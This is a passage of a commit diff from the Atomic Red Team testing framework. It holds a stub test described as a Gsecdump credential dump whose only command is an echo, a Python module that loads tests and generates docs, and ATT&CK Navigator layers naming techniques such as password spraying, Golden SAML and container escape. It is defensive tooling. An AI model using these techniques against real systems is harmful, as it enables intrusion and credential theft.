random_field: abc123
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
echo "ART"
name: command_prompt
atomic_red_team/utils.py
+374
View File
@@ -0,0 +1,374 @@
"""
Atomic Red Team module for loading and managing atomic tests.
This module provides the AtomicRedTeam class that manages atomic tests,
generates documentation, and provides various utility functions.
Optimized for speed with caching and efficient data structures.
"""
import glob
import re
from concurrent.futures import ProcessPoolExecutor, as_completed
from functools import lru_cache
from pathlib import Path
from typing import Dict, List, Optional, Pattern, Tuple, Union
import yaml # PyYAML is faster than ruamel.yaml for loading
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
from jinja2 import Environment, FileSystemLoader
from atomic_red_team.attack_api import ATTACK_API
from atomic_red_team.common import atomics_path
ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team"
@lru_cache(maxsize=1)
def _get_jinja_env() -> Environment:
"""Get cached Jinja2 environment with custom filters."""
template_dir = Path(__file__).parent
env = Environment(
loader=FileSystemLoader(template_dir),
trim_blocks=True,
lstrip_blocks=True,
auto_reload=False, # Disable auto-reload for speed
)
# Add custom filters
env.filters["get_language"] = get_language
env.filters["cleanup"] = cleanup_for_markdown
env.filters["slugify"] = slugify
env.filters["platform_display"] = get_supported_platform_display
return env
@lru_cache(maxsize=1)
def _get_template():
"""Get cached compiled template."""
return _get_jinja_env().get_template("atomic_doc_template.md.j2")
def get_language(executor: str) -> str:
"""Convert executor name to language identifier for code blocks."""
if executor == "command_prompt":
return "cmd"
elif executor == "manual":
return ""
return executor
def get_supported_platform_display(platform: str) -> str:
"""Convert platform identifier to display name (matches Ruby behavior)."""
# Ruby just capitalizes the first letter, except for 'macos' -> 'macOS'
if platform == "macos":
return "macOS"
return platform.capitalize()
def cleanup_for_markdown(value) -> str:
"""Clean up a value for use in markdown tables."""
if value is None:
return ""
return str(value).strip().replace("\\", "&#92;")
# Pre-compiled regex for slugify
_SLUGIFY_PATTERN = re.compile(r"[`~!@#$%^&*()+=<>?,.\/:;\"'|{}\[\]\\–—]")
def slugify(title: str) -> str:
"""Convert a title to a URL-friendly slug."""
slug = title.lower().replace(" ", "-")
return _SLUGIFY_PATTERN.sub("", slug)
def _load_yaml_file(path: str) -> Optional[dict]:
"""Load a YAML file using fast PyYAML loader."""
try:
with open(path, "r", encoding="utf-8") as f:
return yaml.load(f, Loader=SafeLoader)
except Exception:
return None
class AtomicRedTeam:
"""
Main class for managing Atomic Red Team tests.
Provides methods for loading atomic tests, generating documentation,
and validating YAML files. Optimized for speed.
"""
def __init__(self, atomics_directory: Optional[str] = None):
"""
Initialize the AtomicRedTeam instance.
Args:
atomics_directory: Path to the atomics directory.
Defaults to the standard atomics path.
"""
self.atomics_directory = atomics_directory or atomics_path
self._atomic_tests: Optional[List[dict]] = None
self._atomic_tests_by_id: Optional[Dict[str, dict]] = None
self._only_platform: Pattern = re.compile(r".*")
@property
def only_platform(self) -> Pattern:
"""Get the current platform filter pattern."""
return self._only_platform
@only_platform.setter
def only_platform(self, pattern: Pattern):
"""Set the platform filter pattern."""
self._only_platform = pattern
@property
def atomic_test_paths(self) -> List[str]:
"""Returns a list of paths that contain Atomic Tests."""
pattern = f"{self.atomics_directory}/T*/T*.yaml"
return sorted(glob.glob(pattern))
@property
def atomic_tests(self) -> List[dict]:
"""
Returns a list of Atomic Tests in Atomic Red Team (as dicts from source YAML).
"""
if self._atomic_tests is not None:
return self._atomic_tests
self._atomic_tests = []
for path in self.atomic_test_paths:
atomic_yaml = _load_yaml_file(path)
if atomic_yaml:
atomic_yaml["atomic_yaml_path"] = path
self._atomic_tests.append(atomic_yaml)
return self._atomic_tests
def _get_atomic_by_id(self, technique_id: str) -> Optional[dict]:
"""Get atomic test by technique ID using cached index."""
if self._atomic_tests_by_id is None:
self._atomic_tests_by_id = {}
for test in self.atomic_tests:
tid = test.get("attack_technique", "").upper()
if tid:
self._atomic_tests_by_id[tid] = test
return self._atomic_tests_by_id.get(technique_id.upper())
def atomic_tests_for_technique(
self, technique_or_identifier: Union[str, dict]
) -> List[dict]:
"""
Returns the individual Atomic Tests for a given identifier.
Args:
technique_or_identifier: Either a technique ID string (e.g., "T1234")
or an ATT&CK technique object.
Returns:
List of atomic test dictionaries.
"""
if isinstance(technique_or_identifier, dict):
technique_identifier = ATTACK_API.technique_identifier_for_technique(
technique_or_identifier
)
else:
technique_identifier = technique_or_identifier
atomic_yaml = self._get_atomic_by_id(technique_identifier)
return atomic_yaml.get("atomic_tests", []) if atomic_yaml else []
def atomic_tests_for_technique_by_platform(
self, technique_or_identifier: Union[str, dict], platform: str
) -> List[dict]:
"""
Returns the individual Atomic Tests for a given identifier filtered by platform.
Args:
technique_or_identifier: Either a technique ID string (e.g., "T1234")
or an ATT&CK technique object.
platform: Platform to filter by (e.g., "windows", "linux", "macos").
Returns:
List of atomic test dictionaries matching the platform.
"""
tests = self.atomic_tests_for_technique(technique_or_identifier)
return [t for t in tests if platform in t.get("supported_platforms", [])]
def atomic_yaml_has_test_for_platform(
self, yaml_file: str, only_platform: Pattern
) -> bool:
"""
Check if a YAML file has tests for a given platform.
Args:
yaml_file: Path to the YAML file.
only_platform: Regex pattern to match platforms.
Returns:
True if the file has tests for the platform.
"""
yaml_path = Path(yaml_file)
if not yaml_path.exists():
return False
data = _load_yaml_file(str(yaml_path))
if not data or "atomic_tests" not in data:
return False
for atomic in data["atomic_tests"]:
for platform in atomic.get("supported_platforms", []):
if only_platform.match(platform.lower()):
return True
return False
def github_link_to_technique(
self,
technique: dict,
include_identifier: bool = False,
only_platform: Optional[Pattern] = None,
) -> str:
"""
Returns a Markdown formatted GitHub link to a technique.
This will be to the edit page for techniques that already have one or more
Atomic Red Team tests, or the create page for techniques that have no
existing tests for the given OS.
Args:
technique: ATT&CK technique dictionary.
include_identifier: Whether to include the technique ID in the link text.
only_platform: Platform pattern filter. Defaults to instance's only_platform.
Returns:
Markdown formatted link string.
"""
if only_platform is None:
only_platform = self._only_platform
technique_identifier = ATTACK_API.technique_identifier_for_technique(
technique
).upper()
# Use display_name from atomic YAML if available (has full name for sub-techniques)
atomic_yaml = self._get_atomic_by_id(technique_identifier)
if atomic_yaml:
technique_name = atomic_yaml.get("display_name", technique.get("name", ""))
else:
technique_name = technique.get("name", "")
link_display = technique_name
if include_identifier:
link_display = f"{technique_identifier} {technique_name}"
yaml_file = f"{self.atomics_directory}/{technique_identifier}/{technique_identifier}.yaml"
markdown_file = f"{self.atomics_directory}/{technique_identifier}/{technique_identifier}.md"
if (
self.atomic_yaml_has_test_for_platform(yaml_file, only_platform)
and Path(markdown_file).exists()
):
return f"[{link_display}](../../{technique_identifier}/{technique_identifier}.md)"
else:
return f"{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
def generate_technique_docs(
self, technique_identifier: str, output_path: Optional[str] = None
) -> str:
"""
Generate Markdown documentation for a technique.
Args:
technique_identifier: The technique ID (e.g., "T1059").
output_path: Optional path to write the output. If None, returns the content.
Returns:
The generated Markdown content.
"""
technique_identifier = technique_identifier.upper()
# Find the atomic YAML using cached index
atomic_yaml = self._get_atomic_by_id(technique_identifier)
if not atomic_yaml:
raise ValueError(
f"No atomic tests found for technique {technique_identifier}"
)
# Get technique info from ATT&CK for description
technique_info = ATTACK_API.technique_info(technique_identifier)
technique = {
"identifier": technique_identifier,
"name": atomic_yaml.get("display_name", ""),
"description": technique_info.get("description", "") if technique_info else "",
}
# Render using cached template
template = _get_template()
content = template.render(
technique=technique,
atomic_yaml=atomic_yaml,
)
content = content.rstrip() + "\n"
if output_path:
Path(output_path).write_text(content, encoding="utf-8")
return content
def generate_all_docs(self, parallel: bool = True) -> Dict[str, str]:
"""
Generate documentation for all techniques.
Args:
parallel: Whether to use parallel processing.
Returns:
Dictionary mapping technique IDs to their generated documentation.
"""
docs = {}
technique_ids = [
test.get("attack_technique", "").upper()
for test in self.atomic_tests
if test.get("attack_technique")
]
if parallel:
# Use parallel processing
# Create a standalone function for ProcessPoolExecutor
def _generate_doc_worker(args: Tuple[str, str]) -> Tuple[str, str]:
technique_id, atomics_directory = args
from atomic_red_team.utils import AtomicRedTeam
art = AtomicRedTeam(atomics_directory=atomics_directory)
return (technique_id, art.generate_technique_docs(technique_id))
with ProcessPoolExecutor() as executor:
future_to_id = {
executor.submit(_generate_doc_worker, (tid, self.atomics_directory)): tid
for tid in technique_ids
}
for future in as_completed(future_to_id):
tid = future_to_id[future]
try:
docs[tid] = future.result()
except Exception as e:
print(f"Error generating docs for {tid}: {e}")
else:
# Sequential processing
for tid in technique_ids:
try:
docs[tid] = self.generate_technique_docs(tid)
except Exception as e:
print(f"Error generating docs for {tid}: {e}")
return docs
# Singleton instance for convenience
ATOMIC_RED_TEAM = AtomicRedTeam()
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
+1 -1
View File
@@ -1 +1 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
+1 -1
View File
@@ -1 +1 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-esxi.json
+1 -1
View File
@@ -1 +1 @@
{"name":"Atomic Red Team (ESXi)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
{"name":"Atomic Red Team (ESXi)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
+1 -1
View File
@@ -1 +1 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
+1 -1
View File
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password 